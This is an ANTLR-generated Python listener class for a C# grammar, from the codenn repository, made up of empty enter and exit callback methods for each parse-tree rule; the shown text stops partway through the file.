| field | value |
|---|---|
| hexsha | ec1b0a6c07baa25a343acad5549dc79f1f5d09a4 |
| size | 108,115 bytes |
| ext | py |
| lang | Python |
| repo path | src/csharp/CSharp4Listener.py |
| repo | slash-under/codenn |
| repo head hexsha | 747a7c5c6788256cdb1564d0936b5ea91f43ba6c |
| licenses | MIT |
| stars | 216 (2016-06-28T18:44:28Z to 2022-03-26T10:24:03Z) |
| issues | 17 (2016-07-22T23:43:27Z to 2021-06-09T16:36:54Z) |
| forks | 86 (2016-07-02T06:56:31Z to 2021-09-14T06:24:46Z) |

# Generated from ./CSharp4.g4 by ANTLR 4.5.2
from antlr4 import *
# This class defines a complete listener for a parse tree produced by CSharp4Parser.
class CSharp4Listener(ParseTreeListener):
# Enter a parse tree produced by CSharp4Parser#namespace_name.
def enterNamespace_name(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#namespace_name.
def exitNamespace_name(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#type121_name.
def enterType121_name(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#type121_name.
def exitType121_name(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#identifier.
def enterIdentifier(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#identifier.
def exitIdentifier(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#namespace_or_type121_name.
def enterNamespace_or_type121_name(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#namespace_or_type121_name.
def exitNamespace_or_type121_name(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#type121_argument_list_opt.
def enterType121_argument_list_opt(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#type121_argument_list_opt.
def exitType121_argument_list_opt(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#type121.
def enterType121(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#type121.
def exitType121(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#base_type121.
def enterBase_type121(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#base_type121.
def exitBase_type121(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#simple_type121.
def enterSimple_type121(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#simple_type121.
def exitSimple_type121(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#numeric_type121.
def enterNumeric_type121(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#numeric_type121.
def exitNumeric_type121(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#integral_type121.
def enterIntegral_type121(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#integral_type121.
def exitIntegral_type121(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#floating_point_type121.
def enterFloating_point_type121(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#floating_point_type121.
def exitFloating_point_type121(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#nullable_type121.
def enterNullable_type121(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#nullable_type121.
def exitNullable_type121(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#non_nullable_value_type121.
def enterNon_nullable_value_type121(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#non_nullable_value_type121.
def exitNon_nullable_value_type121(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#reference_type121.
def enterReference_type121(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#reference_type121.
def exitReference_type121(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#class_type121.
def enterClass_type121(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#class_type121.
def exitClass_type121(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#interface_type121.
def enterInterface_type121(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#interface_type121.
def exitInterface_type121(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#delegate_type121.
def enterDelegate_type121(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#delegate_type121.
def exitDelegate_type121(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#type121_argument_list.
def enterType121_argument_list(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#type121_argument_list.
def exitType121_argument_list(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#type121_arguments.
def enterType121_arguments(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#type121_arguments.
def exitType121_arguments(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#type121_argument.
def enterType121_argument(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#type121_argument.
def exitType121_argument(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#type121_void.
def enterType121_void(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#type121_void.
def exitType121_void(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#variable_reference.
def enterVariable_reference(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#variable_reference.
def exitVariable_reference(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#argument_list.
def enterArgument_list(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#argument_list.
def exitArgument_list(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#argument.
def enterArgument(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#argument.
def exitArgument(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#argument_name.
def enterArgument_name(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#argument_name.
def exitArgument_name(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#argument_value.
def enterArgument_value(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#argument_value.
def exitArgument_value(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#primary_expression.
def enterPrimary_expression(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#primary_expression.
def exitPrimary_expression(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#primary_expression_start.
def enterPrimary_expression_start(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#primary_expression_start.
def exitPrimary_expression_start(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#bracket_expression.
def enterBracket_expression(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#bracket_expression.
def exitBracket_expression(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#simple_name.
def enterSimple_name(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#simple_name.
def exitSimple_name(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#parenthesized_expression.
def enterParenthesized_expression(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#parenthesized_expression.
def exitParenthesized_expression(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#member_access.
def enterMember_access(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#member_access.
def exitMember_access(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#predefined_type121.
def enterPredefined_type121(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#predefined_type121.
def exitPredefined_type121(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#expression_list.
def enterExpression_list(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#expression_list.
def exitExpression_list(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#this_access.
def enterThis_access(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#this_access.
def exitThis_access(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#base_access.
def enterBase_access(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#base_access.
def exitBase_access(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#object_creation_expression.
def enterObject_creation_expression(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#object_creation_expression.
def exitObject_creation_expression(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#object_or_collection_initializer.
def enterObject_or_collection_initializer(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#object_or_collection_initializer.
def exitObject_or_collection_initializer(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#object_initializer.
def enterObject_initializer(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#object_initializer.
def exitObject_initializer(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#member_initializer_list.
def enterMember_initializer_list(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#member_initializer_list.
def exitMember_initializer_list(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#member_initializer.
def enterMember_initializer(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#member_initializer.
def exitMember_initializer(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#initializer_value.
def enterInitializer_value(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#initializer_value.
def exitInitializer_value(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#collection_initializer.
def enterCollection_initializer(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#collection_initializer.
def exitCollection_initializer(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#element_initializer_list.
def enterElement_initializer_list(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#element_initializer_list.
def exitElement_initializer_list(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#element_initializer.
def enterElement_initializer(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#element_initializer.
def exitElement_initializer(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#array_creation_expression.
def enterArray_creation_expression(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#array_creation_expression.
def exitArray_creation_expression(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#delegate_creation_expression.
def enterDelegate_creation_expression(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#delegate_creation_expression.
def exitDelegate_creation_expression(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#anonymous_object_creation_expression.
def enterAnonymous_object_creation_expression(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#anonymous_object_creation_expression.
def exitAnonymous_object_creation_expression(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#anonymous_object_initializer.
def enterAnonymous_object_initializer(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#anonymous_object_initializer.
def exitAnonymous_object_initializer(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#member_declarator_list.
def enterMember_declarator_list(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#member_declarator_list.
def exitMember_declarator_list(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#member_declarator.
def enterMember_declarator(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#member_declarator.
def exitMember_declarator(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#type121of_expression.
def enterType121of_expression(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#type121of_expression.
def exitType121of_expression(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#unbound_type121_name.
def enterUnbound_type121_name(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#unbound_type121_name.
def exitUnbound_type121_name(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#generic_dimension_specifier.
def enterGeneric_dimension_specifier(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#generic_dimension_specifier.
def exitGeneric_dimension_specifier(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#commas.
def enterCommas(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#commas.
def exitCommas(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#checked_expression.
def enterChecked_expression(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#checked_expression.
def exitChecked_expression(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#unchecked_expression.
def enterUnchecked_expression(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#unchecked_expression.
def exitUnchecked_expression(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#default_value_expression.
def enterDefault_value_expression(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#default_value_expression.
def exitDefault_value_expression(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#unary_expression.
def enterUnary_expression(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#unary_expression.
def exitUnary_expression(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#scan_for_cast_generic_precedence.
def enterScan_for_cast_generic_precedence(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#scan_for_cast_generic_precedence.
def exitScan_for_cast_generic_precedence(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#cast_disambiguation_token.
def enterCast_disambiguation_token(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#cast_disambiguation_token.
def exitCast_disambiguation_token(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#pre_increment_expression.
def enterPre_increment_expression(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#pre_increment_expression.
def exitPre_increment_expression(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#pre_decrement_expression.
def enterPre_decrement_expression(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#pre_decrement_expression.
def exitPre_decrement_expression(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#cast_expression.
def enterCast_expression(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#cast_expression.
def exitCast_expression(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#multiplicative_expression.
def enterMultiplicative_expression(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#multiplicative_expression.
def exitMultiplicative_expression(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#additive_expression.
def enterAdditive_expression(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#additive_expression.
def exitAdditive_expression(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#shift_expression.
def enterShift_expression(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#shift_expression.
def exitShift_expression(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#relational_expression.
def enterRelational_expression(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#relational_expression.
def exitRelational_expression(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#scan_for_shift_generic_precedence.
def enterScan_for_shift_generic_precedence(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#scan_for_shift_generic_precedence.
def exitScan_for_shift_generic_precedence(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#shift_disambiguation_token.
def enterShift_disambiguation_token(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#shift_disambiguation_token.
def exitShift_disambiguation_token(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#istype121.
def enterIstype121(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#istype121.
def exitIstype121(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#is_disambiguation_token.
def enterIs_disambiguation_token(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#is_disambiguation_token.
def exitIs_disambiguation_token(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#equality_expression.
def enterEquality_expression(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#equality_expression.
def exitEquality_expression(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#and_expression.
def enterAnd_expression(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#and_expression.
def exitAnd_expression(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#exclusive_or_expression.
def enterExclusive_or_expression(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#exclusive_or_expression.
def exitExclusive_or_expression(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#inclusive_or_expression.
def enterInclusive_or_expression(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#inclusive_or_expression.
def exitInclusive_or_expression(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#conditional_and_expression.
def enterConditional_and_expression(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#conditional_and_expression.
def exitConditional_and_expression(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#conditional_or_expression.
def enterConditional_or_expression(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#conditional_or_expression.
def exitConditional_or_expression(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#null_coalescing_expression.
def enterNull_coalescing_expression(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#null_coalescing_expression.
def exitNull_coalescing_expression(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#conditional_expression.
def enterConditional_expression(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#conditional_expression.
def exitConditional_expression(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#lambda_expression.
def enterLambda_expression(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#lambda_expression.
def exitLambda_expression(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#anonymous_method_expression.
def enterAnonymous_method_expression(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#anonymous_method_expression.
def exitAnonymous_method_expression(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#anonymous_function_signature.
def enterAnonymous_function_signature(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#anonymous_function_signature.
def exitAnonymous_function_signature(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#explicit_anonymous_function_signature.
def enterExplicit_anonymous_function_signature(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#explicit_anonymous_function_signature.
def exitExplicit_anonymous_function_signature(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#explicit_anonymous_function_parameter_list.
def enterExplicit_anonymous_function_parameter_list(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#explicit_anonymous_function_parameter_list.
def exitExplicit_anonymous_function_parameter_list(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#explicit_anonymous_function_parameter.
def enterExplicit_anonymous_function_parameter(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#explicit_anonymous_function_parameter.
def exitExplicit_anonymous_function_parameter(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#anonymous_function_parameter_modifier.
def enterAnonymous_function_parameter_modifier(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#anonymous_function_parameter_modifier.
def exitAnonymous_function_parameter_modifier(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#implicit_anonymous_function_signature.
def enterImplicit_anonymous_function_signature(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#implicit_anonymous_function_signature.
def exitImplicit_anonymous_function_signature(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#implicit_anonymous_function_parameter_list.
def enterImplicit_anonymous_function_parameter_list(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#implicit_anonymous_function_parameter_list.
def exitImplicit_anonymous_function_parameter_list(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#implicit_anonymous_function_parameter.
def enterImplicit_anonymous_function_parameter(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#implicit_anonymous_function_parameter.
def exitImplicit_anonymous_function_parameter(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#anonymous_function_body.
def enterAnonymous_function_body(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#anonymous_function_body.
def exitAnonymous_function_body(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#query_expression.
def enterQuery_expression(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#query_expression.
def exitQuery_expression(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#from_clause.
def enterFrom_clause(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#from_clause.
def exitFrom_clause(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#query_body.
def enterQuery_body(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#query_body.
def exitQuery_body(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#query_body_clauses.
def enterQuery_body_clauses(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#query_body_clauses.
def exitQuery_body_clauses(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#query_body_clause.
def enterQuery_body_clause(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#query_body_clause.
def exitQuery_body_clause(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#let_clause.
def enterLet_clause(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#let_clause.
def exitLet_clause(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#where_clause.
def enterWhere_clause(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#where_clause.
def exitWhere_clause(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#join_clause.
def enterJoin_clause(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#join_clause.
def exitJoin_clause(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#join_into_clause.
def enterJoin_into_clause(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#join_into_clause.
def exitJoin_into_clause(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#combined_join_clause.
def enterCombined_join_clause(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#combined_join_clause.
def exitCombined_join_clause(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#orderby_clause.
def enterOrderby_clause(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#orderby_clause.
def exitOrderby_clause(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#orderings.
def enterOrderings(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#orderings.
def exitOrderings(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#ordering.
def enterOrdering(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#ordering.
def exitOrdering(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#ordering_direction.
def enterOrdering_direction(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#ordering_direction.
def exitOrdering_direction(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#select_or_group_clause.
def enterSelect_or_group_clause(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#select_or_group_clause.
def exitSelect_or_group_clause(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#select_clause.
def enterSelect_clause(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#select_clause.
def exitSelect_clause(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#group_clause.
def enterGroup_clause(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#group_clause.
def exitGroup_clause(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#query_continuation.
def enterQuery_continuation(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#query_continuation.
def exitQuery_continuation(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#assignment.
def enterAssignment(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#assignment.
def exitAssignment(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#assignment_operator.
def enterAssignment_operator(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#assignment_operator.
def exitAssignment_operator(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#expression.
def enterExpression(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#expression.
def exitExpression(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#non_assignment_expression.
def enterNon_assignment_expression(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#non_assignment_expression.
def exitNon_assignment_expression(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#constant_expression.
def enterConstant_expression(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#constant_expression.
def exitConstant_expression(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#boolean_expression.
def enterBoolean_expression(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#boolean_expression.
def exitBoolean_expression(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#statement.
def enterStatement(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#statement.
def exitStatement(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#embedded_statement.
def enterEmbedded_statement(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#embedded_statement.
def exitEmbedded_statement(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#simple_embedded_statement.
def enterSimple_embedded_statement(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#simple_embedded_statement.
def exitSimple_embedded_statement(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#block.
def enterBlock(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#block.
def exitBlock(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#statement_list.
def enterStatement_list(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#statement_list.
def exitStatement_list(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#empty_statement.
def enterEmpty_statement(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#empty_statement.
def exitEmpty_statement(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#labeled_statement.
def enterLabeled_statement(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#labeled_statement.
def exitLabeled_statement(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#declaration_statement.
def enterDeclaration_statement(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#declaration_statement.
def exitDeclaration_statement(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#local_variable_declaration.
def enterLocal_variable_declaration(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#local_variable_declaration.
def exitLocal_variable_declaration(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#local_variable_type121.
def enterLocal_variable_type121(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#local_variable_type121.
def exitLocal_variable_type121(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#local_variable_declarators.
def enterLocal_variable_declarators(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#local_variable_declarators.
def exitLocal_variable_declarators(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#local_variable_declarator.
def enterLocal_variable_declarator(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#local_variable_declarator.
def exitLocal_variable_declarator(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#local_variable_initializer.
def enterLocal_variable_initializer(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#local_variable_initializer.
def exitLocal_variable_initializer(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#local_constant_declaration.
def enterLocal_constant_declaration(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#local_constant_declaration.
def exitLocal_constant_declaration(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#expression_statement.
def enterExpression_statement(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#expression_statement.
def exitExpression_statement(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#statement_expression.
def enterStatement_expression(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#statement_expression.
def exitStatement_expression(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#selection_statement.
def enterSelection_statement(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#selection_statement.
def exitSelection_statement(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#ifBodyBlock.
def enterIfBodyBlock(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#ifBodyBlock.
def exitIfBodyBlock(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#ifBodySingle.
def enterIfBodySingle(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#ifBodySingle.
def exitIfBodySingle(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#if_statement.
def enterIf_statement(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#if_statement.
def exitIf_statement(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#switch_statement.
def enterSwitch_statement(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#switch_statement.
def exitSwitch_statement(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#switch_block.
def enterSwitch_block(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#switch_block.
def exitSwitch_block(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#switch_sections.
def enterSwitch_sections(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#switch_sections.
def exitSwitch_sections(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#switch_section.
def enterSwitch_section(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#switch_section.
def exitSwitch_section(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#switch_labels.
def enterSwitch_labels(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#switch_labels.
def exitSwitch_labels(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#switch_label.
def enterSwitch_label(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#switch_label.
def exitSwitch_label(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#iteration_statement.
def enterIteration_statement(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#iteration_statement.
def exitIteration_statement(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#while_statement.
def enterWhile_statement(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#while_statement.
def exitWhile_statement(self, ctx):
pass
# Enter a parse tree produced by CSharp4Parser#do_statement.
def enterDo_statement(self, ctx):
pass
# Exit a parse tree produced by CSharp4Parser#do_statement.
def exitDo_statement(self, ctx):
